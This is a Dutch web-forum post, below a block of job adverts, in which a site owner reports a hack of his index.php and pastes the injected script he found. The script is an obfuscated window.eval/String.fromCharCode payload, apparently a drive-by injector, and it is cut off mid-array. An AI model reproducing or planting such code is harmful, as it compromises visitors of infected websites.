Gehacked, wat nu?

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

Senior .NET developer

Klaar voor een nieuwe uitdaging? Welke technologieën gaan schuil achter de dagelijkse energievoorziening? Als senior .NET developer bij Kenter maak jij samen met je team het verschil, zowel voor de interne organisatie als voor eindklanten. Samen bouwen jullie aan innovatieve dienstverlening met behulp van de nieuwste technologieën en tools. Het is een functie met veel vrijheid, goede arbeidsvoorwaarden én je draagt jouw steentje bij aan de energietransitie. Klinkt dit als iets voor jou? Lees dan verder of solliciteer direct! Wat ga je doen als senior .NET developer? Als senior .NET developer bij Kenter (onderdeel van Alliander) ben je van onschatbare

Bekijk vacature »

SQL ontwikkelaar

Functieomschrijving Voor een gave werkgever in regio Breda zijn wij per direct op zoek naar een SQL ontwikkelaar/ functioneel consultant. Hier wordt jij mede verantwoordelijk voor zowel de design en implementatie van SQL-databases als voor het verstaan van de processen van klanten naar het vertalen van deze processen naar IT-oplossingen. Jouw takenpakket komt als volgt uit te zien: Je test de ontwikkelde oplossingen om er zeker van te zijn dat deze voldoen aan de functionele specificaties en de behoeften van de organisatie; Je ontwerpt, ontwikkelt en implementeert SQL-databases om de data behoeften van de organisatie te ondersteunen; Je stelt op

Bekijk vacature »

Back-end ontwikkelaar

Functie omschrijving Wil jij meebouwen aan diverse databasesystemen in een klein bedrijf met een platte organisatie? In een team van ruim 10 ontwikkelaars wordt er aan diverse ICT oplossingen gewerkt. Jouw taken hierbij zullen bestaan uit: Het onderhouden en door-ontwikkelen van bestaande databases. Denk hierbij aan schema verbeteringen en performance-tuning. Bij nieuwe ontwikkelingen ga jij ook bezig met het bouwen van het databaseschema. Omdat je in een klein team werkt zal je ook de C# routine verder uitbouwen en ontwikkelen. Ook kan je meedraaien in algemene refactory-, ontwikkel- of testwerkzaamheden. Je zal voornamelijk gebruik maken van de volgende technieken: .NET

Bekijk vacature »

Java Ontwikkelaar

Java/Kotlin Developer Ben jij een ervaren Java/Kotlin developer met een passie voor het automatiseren van bedrijfsprocessen? Wil je graag deelnemen aan uitdagende projecten bij aansprekende klanten? En ben je op zoek naar een professioneel, ambitieus en dynamisch bedrijf om je carrière verder te ontwikkelen? Kom dan ons team bij Ritense in Amsterdam versterken! Zo ziet de functie eruit: Als Java/Kotlin developer bij Ritense ben je verantwoordelijk voor de ontwikkeling en implementatie van applicaties die bedrijfsprocessen automatiseren, zodat onze klanten slimmer, efficiënter en klantgerichter kunnen werken. Als developer ben je in de lead en zorg je voor de correcte oplevering van

Bekijk vacature »

Software Developer C++ en Perl

Ben je een slimme en enthousiaste universitair opgeleide bèta die graag bij een relatief klein softwarebedrijf wil werken waar de sfeer goed is en eigen inbreng gewaardeerd wordt? Wij, IntelliMagic in Leiden, ontwikkelen technisch hoogwaardige software op het gebied van IT infrastructuur performance analytics. Het type software zorgt voor intellectueel interessante uitdagingen. We ontwerpen de producten zelf en verkopen deze als off-the-shelf software aan grote bedrijven in Europa en de VS. Wij zoeken een ervaren C++ software engineer met kennis van Perl voor een van onze ontwikkelteams. Werkzaamheden Samen met de andere ontwikkelaars specificeren, ontwerpen en implementeren van nieuwe functionaliteit

Bekijk vacature »

Back-end Developer C#

Functie omschrijving We are looking for a dutch native speaker Ben jij een ervaren back-end developer, die graag in een in-house functie wil werken? Passen de woorden innovatie, programmeren en teamspeler bij jou? Zoek niet verder en lees snel verder. Voor een echt familiebedrijf in de regio van Uden ben ik op zoek naar een back-end developer, die met name kennis heeft van C# en .NET. Jij gaat de interne applicaties verder optimaliseren en nieuwe features ontwikkelen. Verder ga je de volgende werkzaamheden uitvoeren: Ondersteunen gebruikers; Uitvoeren van analyses van de software/applicaties; Maken van functionele ontwerpen en deze door vertalen

Bekijk vacature »

.NET developer

Functie Als developer heb jij de keuze om aan te sluiten bij het team (13 developers) die op locatie projectmatig bij klanten werkt. Wanneer jij liever intern bij de werkgever werkt is er ook alle ruimte voor jou in het interne team (8 developers) van dit bedrijf. Je werkt samen aan verschillende projecten bij of voor de klant. Het project wordt aangeleverd door sales aan de project manager. Die maakt samen met de Resourcer een planning en op basis daarvan wordt uit het development team een “projectgroep” opgesteld. Hoeveel en welke projecten jij wilt oppakken gebeurt geheel in samenspraak met

Bekijk vacature »

Lead developer

Functie Als Lead developer wordt jij onderdeel van een multidisciplinair team van circa 23 software engineers. Als team werken jullie agile en zijn termen als Continuous Integration en Continuous Delivery dagelijkse koek. Jullie werken aan uitdagende en afwisselende projecten met als doel klanten een totaal oplossing aan te kunnen bieden. Jij wordt verantwoordelijk voor complete projecten waarbij jij als verantwoordelijke zorgt dat het project op de juiste manier blijft draaien. Zo haal jij ook de requirements op bij de klant en kijk jij samen met het team en met de salesafdeling hoeveel uren hiervoor nodig zijn. Daarnaast stuur jij jouw

Bekijk vacature »

Back end developer PHP

Functie Heb jij altijd al eens bij een bedrijf willen werken waar jij géén nummertje bent, die alleen maar uitvoerend werk doet? Dan zou je hier perfect passen! Tuurlijk, je werkt aan projecten voor grote of kleine bedrijven… Het enige verschil hier is, jouw mening telt hier écht. Jouw inbreng wordt gewaardeerd, serieus genomen en gebruikt. En vergeet niet, je werkt niet alleen aan deze projecten. Er werken in totaal ruim 25 developers en designers, onderverdeeld over 3 development teams. Voornamelijk bestaande uit Medior en Senior developers, die samen voor een inspirerende en ambitieuze omgeving zorgen. Hun visie is namelijk

Bekijk vacature »

Front-end React developer

Functie Het frontend team bestaat momenteel uit 4 dedicated front-enders en is hard aan het groeien! Ook werken er diverse designers waar je veel mee schakelt. Samen leveren jullie een essentiële bijdrage aan de applicaties die ze voor hun klanten realiseren, jij bent hierin de schakel tussen de eindgebruiker en de slimme backend. Je werkt in het frontend team samen met de backend teams en product owners om te zorgen dat onze applicaties een fijne gebruikerservaring opleveren. Ze werken o.a. met: React, Atomic design, Styled components, JavaScript / TypeScript, NPM, Webpack Blade templates, HTML, SCSS, Git flow. Eisen • HBO

Bekijk vacature »

Functioneel applicatiebeheerder - SOP-SYS-SAM

TenneT is hard groeiend om de onze ambities waar te kunnen maken. Zo nemen wij een leidende rol in het aanjagen van de energietransitie. Het werven van nieuw talent speelt daarin een cruciale rol. Wij zijn op zoek naar een gedreven Functioneel Applicatiebeheerder op onze locatie Arnhem die hieraan wil bijdragen en misschien ben jij dat wel? Jouw bijdrage aan TenneT Je gaat samenwerken in een team van circa 15 functioneel applicatiebeheerders en gaat onderdeel uitmaken van een DevOps team. Met dit team ga je applicaties (laten) ontwikkelen en beheren. Hierbij concentreer je je vooral op de functionele aspecten, zodat

Bekijk vacature »

Outsystems Developer Junior

Dit ga je doen Bouwen aan nieuwe en innovatieve applicaties; Maken van koppelingen tussen Outsystems en het bestaande applicatielandschap; Troubleshooting op bestaande software. Hier ga je werken De organisatie is internationale speler binnen de bouwbranche en richt zich op de infrastructuur, zowel boven als onder de grond. Ze zijn ruim 1100 man groot en maken op IT vlak een mooie groei door. Als junior Outsystems Developer kom je te werken op een IT-afdeling van zo'n 25 man groot. Een aantal jaar geleden hebben ze de keuze gemaakt om zich meer te gaan richten op ontwikkeling en door de groei van

Bekijk vacature »

3D BIM Add-on Developer

As a 3D BIM add- on developer at KUBUS, you will develop add-ons (called BCF- Managers) to the leading building information modeling (BIM) programs Revit, Navisworks, Archicad, AutoCAD and Tekla Structures. BCF Managers enable data transfer between BIM software and BIMcollab. You will work on both the front- and the back-end. As a software company, KUBUS is in a unique position. We build our own products that are used by tens of thousands of users worldwide. Our company is just the right size: big enough to make a real impact in the market, but small enough that as an individual

Bekijk vacature »

Medior Java developer

Wat je gaat doen: Of beter nog, wat wil jij doen? Binnen DPA GEOS zijn we dan ook op zoek naar enthousiaste Java developers om ons development team te versterken. Als Java developer werk je in Agile/Scrum teams bij onze klanten en daarbij kun je eventueel ook andere ontwikkelaars begeleiden in het softwareontwikkelproces. Verder draag je positief bij aan de teamgeest binnen een projectteam en je kijkt verder dan je eigen rol. Je gaat software maken voor verschillende opdrachtgevers in jouw regio. Je bent een professional die het IT-vak serieus neemt en kwaliteit levert. Je leert snel vanwege je diepgaande

Bekijk vacature »

Front-end developer Consultancy in teamverband wer

Functie Het team bestaat uit User Experience designers, Data Scientists en Software Engineers. Momenteel zijn ze op zoek naar een ervaren Front-end of Fullstack developer die samen met de consultants aan de slag gaat om de business requirements te vertalen naar technische oplossingen. Los van het finetunen van extenties, help je bij het configureren van bijvoorbeeld een mobiel bankieren app. Hierin ben je van A tot Z betrokken en zie je bijvoorbeeld ook toe op de uitvoering van testen. Je expertise wordt optimaal benut en je krijgt verschillende kansen om deze uit te breiden door met verschillende innovatieve technologieën aan

Bekijk vacature »
John Cena

John Cena

09/07/2012 09:30:39
Quote Anchor link
Zo,

Men dempt de put als...

Maar, ik weet niet in welke put het fout ging.

De index.php is aangepast en er is een bepaalde code bij ingezet. Hoe wordt dit algemeen gedaan? FTP kraak?

De meest awkward looking code:
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
<script>/*km0ae9gr6m*/window.eval(String.fromCharCode(116,114,121,123,112,114,111,116,111,116,121,112,101,37,50,59,125,99,97,116,99,104,40,97,115,100,41,123,120,61,50,59,125,116,114,121,123,113,61,100,111,99,117,109,101,110,116,91,40,120,41,63,34,99,34,43,34,114,34,58,50,43,34,101,34,43,34,97,34,43,34,116,34,43,34,101,34,43,34,69,34,43,34,108,34,43,34,101,34,43,34,109,34,43,40,40,102,41,63,34,101,34,43,34,110,34,43,34,116,34,58,34,34,41,93,40,34,112,34,41,59,113,46,97,112,112,101,110,100,67,104,105,108,100,40,113,43,34,34,41,59,125,99,97,116,99,104,40,102,119,98,101,119,101,41,123,105,61,48,59,116,114,121,123,112,114,111,116,111,116,121,112,101,42,53,59,125,99,97,116,99,104,40,122,41,123,102,114,61,34,102,114,111,109,67,104,97,114,34,59,102,61,91,53,49,48,44,55,48,50,44,53,53,48,44,53,57,52,44,53,56,48,44,54,51,48,44,53,53,53,44,54,54,48,44,49,54,48,44,54,54,48,44,53,48,53,44,55,50,48,44,53,56,48,44,52,57,50,44,52,56,53,44,54,54,48,44,53,48,48,44,54,54,54,44,53,52,53,44,52,54,56,44,53,56,53,44,54,53,52,44,52,57,48,44,54,48,54,44,53,55,48,44,50,52,48,44,50,48,53,44,55,51,56,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,55,48,56,44,52,56,53,44,54,56,52,44,49,54,48,44,54,50,52,44,53,50,53,44,49,57,50,44,51,48,53,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,51,48,44,54,57,48,44,53,48,53,44,54,48,54,44,53,48,48,44,49,57,50,44,50,51,53,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,51,48,44,52,56,54,44,50,57,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,57,48,44,53,56,50,44,53,55,48,44,49,57,50,44,53,52,48,44,54,54,54,44,49,54,48,44,51,54,54,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,53,55,53,44,54,48,54,44,53,48,53,44,54,48,48,44,49,54,48,44,50,50,50,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,52,48,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,55,48,56,44,52,56,53,44,54,56,52,44,49,54,48,44,54,57,54,44,53,48,53,44,54,57,48,44,53,56,48,44,49,57,50,44,51,48,53,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,51,48,44,51,57,48,44,49,54,48,44,50,53,50,44,49,54,48,44,54,52,56,44,53,53,53,44,49,57,50,44,50,50,53,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,51,48,44,52,57,50,44,49,54,48,44,50,53,50,44,49,54,48,44,54,50,52,44,53,50,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,51,48,44,53,49,48,44,50,52,48,44,53,56,48,44,54,48,54,44,53,55,53,44,54,57,54,44,49,54,48,44,51,55,50,44,49,54,48,44,50,56,56,44,50,48,53,44,55,51,56,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,53,55,53,44,54,48,54,44,53,48,53,44,54,48,48,44,49,54,48,44,51,54,54,44,49,54,48,44,54,57,54,44,53,48,53,44,54,57,48,44,53,56,48,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,55,53,48,44,49,54,48,44,54,48,54,44,53,52,48,44,54,57,48,44,53,48,53,44,49,57,50,44,54,49,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,51,48,44,54,57,48,44,53,48,53,44,54,48,54,44,53,48,48,44,49,57,50,44,51,48,53,44,49,57,50,44,53,56,48,44,54,48,54,44,53,55,53,44,54,57,54,44,49,54,48,44,50,53,56,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,51,56,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,55,53,48,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,56,52,44,53,48,53,44,54,57,54,44,53,56,53,44,54,56,52,44,53,53,48,44,49,57,50,44,50,48,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,53,55,53,44,54,48,54,44,53,48,53,44,54,48,48,44,49,54,48,44,50,53,50,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,53,53,53,44,54,54,48,44,53,48,53,44,52,55,52,44,53,57,48,44,54,48,54,44,53,55,48,44,52,54,50,44,50,48,53,44,51,53,52,44,53,48,44,55,53,48,44,53,48,44,54,48,44,53,49,48,44,55,48,50,44,53,53,48,44,53,57,52,44,53,56,48,44,54,51,48,44,53,53,53,44,54,54,48,44,49,54,48,44,52,57,50,44,52,56,53,44,54,54,48,44,53,48,48,44,54,54,54,44,53,52,53,44,52,54,56,44,53,56,53,44,54,53,52,44,52,57,48,44,54,48,54,44,53,55,48,44,52,50,54,44,53,48,53,44,54,54,48,44,53,48,53,44,54,56,52,44,52,56,53,44,54,57,54,44,53,53,53,44,54,56,52,44,50,48,48,44,55,48,50,44,53,53,48,44,54,51,48,44,54,48,48,44,50,52,54,44,54,49,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,57,48,44,53,56,50,44,53,55,48,44,49,57,50,44,53,48,48,44,49,57,50,44,51,48,53,44,49,57,50,44,53,53,48,44,54,48,54,44,53,57,53,44,49,57,50,44,51,52,48,44,53,56,50,44,53,56,48,44,54,48,54,44,50,48,48,44,55,48,50,44,53,53,48,44,54,51,48,44,54,48,48,44,50,53,50,44,50,52,53,44,50,56,56,44,50,52,48,44,50,56,56,44,50,48,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,55,48,56,44,52,56,53,44,54,56,52,44,49,54,48,44,54,57,48,44,49,54,48,44,51,54,54,44,49,54,48,44,54,48,48,44,50,51,48,44,54,49,56,44,53,48,53,44,54,57,54,44,51,54,48,44,54,54,54,44,53,56,53,44,54,56,52,44,53,55,53,44,50,52,48,44,50,48,53,44,49,57,50,44,51,49,48,44,49,57,50,44,50,52,53,44,51,48,48,44,49,54,48,44,51,55,56,44,49,54,48,44,50,57,52,44,49,54,48,44,51,52,56,44,49,54,48,44,50,56,56,44,50,57,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,51,48,44,54,57,48,44,53,48,53,44,54,48,54,44,53,48,48,44,49,57,50,44,51,48,53,44,49,57,50,44,50,53,48,44,51,48,54,44,50,54,48,44,51,49,56,44,50,55,48,44,51,51,48,44,50,56,48,44,51,52,50,44,50,52,48,44,50,57,52,44,49,54,48,44,50,53,56,44,49,54,48,44,50,52,48,44,53,48,48,44,50,55,54,44,53,49,53,44,54,48,54,44,53,56,48,44,52,54,50,44,53,53,53,44,54,54,48,44,53,56,48,44,54,50,52,44,50,48,48,44,50,52,54,44,49,54,48,44,50,53,50,44,49,54,48,44,50,56,56,44,54,48,48,44,52,50,48,44,51,53,48,44,52,50,48,44,51,53,48,44,52,50,48,44,51,53,48,44,50,52,54,44,49,54,48,44,50,53,56,44,49,54,48,44,50,52,48,44,53,48,48,44,50,55,54,44,53,49,53,44,54,48,54,44,53,56,48,44,52,48,56,44,52,56,53,44,54,57,54,44,53,48,53,44,50,52,48,44,50,48,53,44,49,57,50,44,50,49,48,44,49,57,50,44,50,52,48,44,55,50,48,44,51,53,48,44,52,50,48,44,51,53,48,44,52,50,48,44,50,48,53,44,50,53,56,44,49,54,48,44,50,52,48,44,51,56,53,44,53,56,50,44,53,56,48,44,54,50,52,44,50,51,48,44,54,56,52,44,53,53,53,44,55,48,50,44,53,53,48,44,54,48,48,44,50,48,48,44,54,57,48,44,49,54,48,44,50,53,50,44,49,54,48,44,50,56,56,44,54,48,48,44,52,50,48,44,51,53,48,44,52,50,48,44,50,48,53,44,50,52,54,44,50,57,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,51,48,44,51,57,48,44,49,54,48,44,51,54,54,44,49,54,48,44,51,49,50,44,50,56,48,44,51,48,48,44,50,55,53,44,50,57,52,44,50,57,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,51,48,44,52,54,50,44,49,54,48,44,51,54,54,44,49,54,48,44,51,48,48,44,50,52,53,44,51,49,50,44,50,55,53,44,51,49,50,44,50,56,48,44,51,48,54,44,50,55,48,44,51,49,50,44,50,55,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,52,48,53,44,49,57,50,44,51,48,53,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,51,48,44,52,54,50,44,49,54,48,44,50,56,50,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,51,50,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,52,49,48,44,49,57,50,44,51,48,53,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,51,48,44,52,54,50,44,49,54,48,44,50,50,50,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,51,50,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,53,53,53,44,54,54,48,44,53,48,53,44,52,55,52,44,53,57,48,44,54,48,54,44,53,55,48,44,52,54,50,44,49,54,48,44,51,54,54,44,49,54,48,44,50,57,52,44,50,51,48,44,50,56,56,44,49,54,48,44,50,56,50,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,51,56,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,53,53,48,44,54,48,54,44,54,48,48,44,54,57,54,44,49,54,48,44,51,54,54,44,49,54,48,44,54,54,48,44,53,48,53,44,55,50,48,44,53,56,48,44,52,57,50,44,52,56,53,44,54,54,48,44,53,48,48,44,54,54,54,44,53,52,53,44,52,54,56,44,53,56,53,44,54,53,52,44,52,57,48,44,54,48,54,44,53,55,48,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,56,52,44,53,48,53,44,54,57,54,44,53,56,53,44,54,56,52,44,53,53,48,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,57,53,44,54,48,44,54,50,53,44,54,48,44,53,48,44,54,49,50,44,53,56,53,44,54,54,48,44,52,57,53,44,54,57,54,44,53,50,53,44,54,54,54,44,53,53,48,44,49,57,50,44,52,57,53,44,54,56,52,44,53,48,53,44,53,56,50,44,53,56,48,44,54,48,54,44,52,49,48,44,53,56,50,44,53,53,48,44,54,48,48,44,53,53,53,44,54,53,52,44,51,57,48,44,55,48,50,44,53,52,53,44,53,56,56,44,53,48,53,44,54,56,52,44,50,48,48,44,54,56,52,44,50,50,48,44,49,57,50,44,51,56,53,44,54,51,48,44,53,53,48,44,50,54,52,44,49,54,48,44,52,54,50,44,52,56,53,44,55,50,48,44,50,48,53,44,55,51,56,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,56,52,44,53,48,53,44,54,57,54,44,53,56,53,44,54,56,52,44,53,53,48,44,49,57,50,44,51,56,53,44,53,56,50,44,53,56,48,44,54,50,52,44,50,51,48,44,54,56,52,44,53,53,53,44,55,48,50,44,53,53,48,44,54,48,48,44,50,48,48,44,50,52,48,44,51,56,53,44,53,56,50,44,54,48,48,44,50,55,48,44,51,56,53,44,54,51,48,44,53,53,48,44,50,52,54,44,49,54,48,44,50,53,50,44,49,54,48,44,54,56,52,44,50,51,48,44,54,54,48,44,53,48,53,44,55,50,48,44,53,56,48,44,50,52,48,44,50,48,53,44,49,57,50,44,50,49,53,44,49,57,50,44,51,56,53,44,54,51,48,44,53,53,48,44,50,52,54,44,50,57,53,44,54,48,44,54,50,53,44,54,48,44,53,48,44,54,49,50,44,53,56,53,44,54,54,48,44,52,57,53,44,54,57,54,44,53,50,53,44,54,54,54,44,53,53,48,44,49,57,50,44,53,49,53,44,54,48,54,44,53,53,48,44,54,48,54,44,53,55,48,44,53,56,50,44,53,56,48,44,54,48,54,44,52,48,48,44,54,57,48,44,53,48,53,44,55,48,50,44,53,48,48,44,54,54,54,44,52,49,48,44,53,56,50,44,53,53,48,44,54,48,48,44,53,53,53,44,54,53,52,44,52,49,53,44,54,57,54,44,53,55,48,44,54,51,48,44,53,53,48,44,54,49,56,44,50,48,48,44,55,48,50,44,53,53,48,44,54,51,48,44,54,48,48,44,50,54,52,44,49,54,48,44,54,52,56,44,53,48,53,44,54,54,48,44,53,49,53,44,54,57,54,44,53,50,48,44,50,54,52,44,49,54,48,44,55,51,50,44,53,53,53,44,54,54,48,44,53,48,53,44,50,52,54,44,54,49,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,57,48,44,53,56,50,44,53,55,48,44,49,57,50,44,53,55,48,44,53,56,50,44,53,53,48,44,54,48,48,44,49,54,48,44,51,54,54,44,49,54,48,44,54,54,48,44,53,48,53,44,55,49,52,44,49,54,48,44,52,57,50,44,52,56,53,44,54,54,48,44,53,48,48,44,54,54,54,44,53,52,53,44,52,54,56,44,53,56,53,44,54,53,52,44,52,57,48,44,54,48,54,44,53,55,48,44,52,50,54,44,53,48,53,44,54,54,48,44,53,48,53,44,54,56,52,44,52,56,53,44,54,57,54,44,53,53,53,44,54,56,52,44,50,48,48,44,55,48,50,44,53,53,48,44,54,51,48,44,54,48,48,44,50,52,54,44,50,57,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,57,48,44,53,56,50,44,53,55,48,44,49,57,50,44,53,52,48,44,54,48,54,44,53,56,48,44,54,57,54,44,53,48,53,44,54,56,52,44,53,55,53,44,49,57,50,44,51,48,53,44,49,57,50,44,52,53,53,44,50,51,52,44,52,56,53,44,50,51,52,44,50,50,48,44,50,51,52,44,52,57,48,44,50,51,52,44,50,50,48,44,50,51,52,44,52,57,53,44,50,51,52,44,50,50,48,44,50,51,52,44,53,48,48,44,50,51,52,44,50,50,48,44,50,51,52,44,53,48,53,44,50,51,52,44,50,50,48,44,50,51,52,44,53,49,48,44,50,51,52,44,50,50,48,44,50,51,52,44,53,49,53,44,50,51,52,44,50,50,48,44,50,51,52,44,53,50,48,44,50,51,52,44,50,50,48,44,50,51,52,44,53,50,53,44,50,51,52,44,50,50,48,44,50,51,52,44,53,51,48,44,50,51,52,44,50,50,48,44,50,51,52,44,53,51,53,44,50,51,52,44,50,50,48,44,50,51,52,44,53,52,48,44,50,51,52,44,50,50,48,44,50,51,52,44,53,52,53,44,50,51,52,44,50,50,48,44,50,51,52,44,53,53,48,44,50,51,52,44,50,50,48,44,50,51,52,44,53,53,53,44,50,51,52,44,50,50,48,44,50,51,52,44,53,54,48,44,50,51,52,44,50,50,48,44,50,51,52,44,53,54,53,44,50,51,52,44,50,50,48,44,50,51,52,44,53,55,48,44,50,51,52,44,50,50,48,44,50,51,52,44,53,55,53,44,50,51,52,44,50,50,48,44,50,51,52,44,53,56,48,44,50,51,52,44,50,50,48,44,50,51,52,44,53,56,53,44,50,51,52,44,50,50,48,44,50,51,52,44,53,57,48,44,50,51,52,44,50,50,48,44,50,51,52,44,53,57,53,44,50,51,52,44,50,50,48,44,50,51,52,44,54,48,48,44,50,51,52,44,50,50,48,44,50,51,52,44,54,48,53,44,50,51,52,44,50,50,48,44,50,51,52,44,54,49,48,44,50,51,52,44,52,54,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,55,48,56,44,52,56,53,44,54,56,52,44,49,54,48,44,54,57,48,44,53,56,48,44,54,56,52,44,49,54,48,44,51,54,54,44,49,54,48,44,50,51,52,44,49,57,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,49,50,44,53,53,53,44,54,56,52,44,50,48,48,44,55,48,56,44,52,56,53,44,54,56,52,44,49,54,48,44,54,51,48,44,49,54,48,44,51,54,54,44,49,54,48,44,50,56,56,44,50,57,53,44,49,57,50,44,53,50,53,44,49,57,50,44,51,48,48,44,49,57,50,44,53,52,48,44,54,48,54,44,53,53,48,44,54,49,56,44,53,56,48,44,54,50,52,44,50,57,53,44,49,57,50,44,53,50,53,44,49,57,50,44,50,49,53,44,50,53,56,44,49,54,48,44,50,52,54,44,54,49,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,55,53,44,54,57,54,44,53,55,48,44,49,57,50,44,50,49,53,44,51,54,54,44,49,54,48,44,54,52,56,44,53,48,53,44,54,57,54,44,53,56,48,44,54,48,54,44,53,55,48,44,54,57,48,44,52,53,53,44,53,57,52,44,53,55,48,44,54,48,54,44,52,56,53,44,54,57,54,44,53,48,53,44,52,57,50,44,52,56,53,44,54,54,48,44,53,48,48,44,54,54,54,44,53,52,53,44,52,54,56,44,53,56,53,44,54,53,52,44,52,57,48,44,54,48,54,44,53,55,48,44,50,52,48,44,53,55,48,44,53,56,50,44,53,53,48,44,54,48,48,44,50,50,48,44,49,57,50,44,50,52,48,44,50,54,52,44,49,54,48,44,54,52,56,44,53,48,53,44,54,57,54,44,53,56,48,44,54,48,54,44,53,55,48,44,54,57,48,44,50,51,48,44,54,52,56,44,53,48,53,44,54,54,48,44,53,49,53,44,54,57,54,44,53,50,48,44,49,57,50,44,50,50,53,44,49,57,50,44,50,52,53,44,50,52,54,44,52,54,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,55,53,48,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,56,52,44,53,48,53,44,54,57,54,44,53,56,53,44,54,56,52,44,53,53,48,44,49,57,50,44,53,55,53,44,54,57,54,44,53,55,48,44,49,57,50,44,50,49,53,44,49,57,50,44,49,57,53,44,50,55,54,44,49,57,53,44,49,57,50,44,50,49,53,44,49,57,50,44,54,49,48,44,54,54,54,44,53,53,48,44,54,48,54,44,50,57,53,44,54,48,44,54,50,53,44,54,48,44,53,48,44,54,57,48,44,53,48,53,44,54,57,54,44,52,50,48,44,54,51,48,44,53,52,53,44,54,48,54,44,53,53,53,44,55,48,50,44,53,56,48,44,50,52,48,44,53,49,48,44,55,48,50,44,53,53,48,44,53,57,52,44,53,56,48,44,54,51,48,44,53,53,53,44,54,54,48,44,50,48,48,44,50,52,54,44,54,49,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,56,48,44,54,56,52,44,54,48,53,44,55,51,56,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,51,48,44,53,49,48,44,50,52,48,44,53,56,48,44,55,50,54,44,53,54,48,44,54,48,54,44,53,53,53,44,54,49,50,44,49,54,48,44,54,51,48,44,53,49,48,44,54,56,52,44,52,56,53,44,54,53,52,44,53,48,53,44,53,50,50,44,52,56,53,44,54,57,48,44,51,51,53,44,54,56,52,44,53,48,53,44,53,56,50,44,53,56,48,44,54,48,54,44,53,48,48,44,49,57,50,44,51,48,53,44,51,54,54,44,49,54,48,44,50,48,52,44,53,56,53,44,54,54,48,44,53,48,48,44,54,48,54,44,53,49,48,44,54,51,48,44,53,53,48,44,54,48,54,44,53,48,48,44,50,48,52,44,50,48,53,44,55,51,56,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,